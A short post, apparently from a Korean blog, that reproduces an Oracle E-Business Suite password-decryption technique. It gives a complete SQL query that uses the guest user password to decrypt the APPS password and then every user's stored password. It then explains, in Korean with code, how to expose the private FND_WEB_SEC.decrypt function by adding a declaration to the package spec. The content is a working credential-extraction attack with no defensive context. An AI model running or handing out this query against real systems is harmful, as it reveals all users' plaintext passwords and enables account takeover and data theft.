from : Oracle E-Business Suite Vulnerability: Users Passwords Decrypted
WITH guest AS ( SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd, UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'), 1, INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'), '/' ) - 1 ) ) user_name FROM DUAL) SELECT fnd_user.user_name, fnd_web_sec.decrypt ((SELECT fnd_web_sec.decrypt (guest.user_pwd, fnd_user.encrypted_foundation_password ) apps_password FROM fnd_user, guest WHERE fnd_user.user_name = guest.user_name), fnd_user.encrypted_user_password ) decrypted_user_password FROM fnd_user ORDER BY fnd_user.user_name
fnd_web_sec.decrypt 가 private function 이므로 위의 SQL 문을 정상 실행시키려면 아래와 같은 선언을 APPS.FND_WEB_SEC package 에 추가시켜 주어야 한다.
FUNCTION decrypt(key IN VARCHAR2, value IN VARCHAR2)
RETURN VARCHAR2;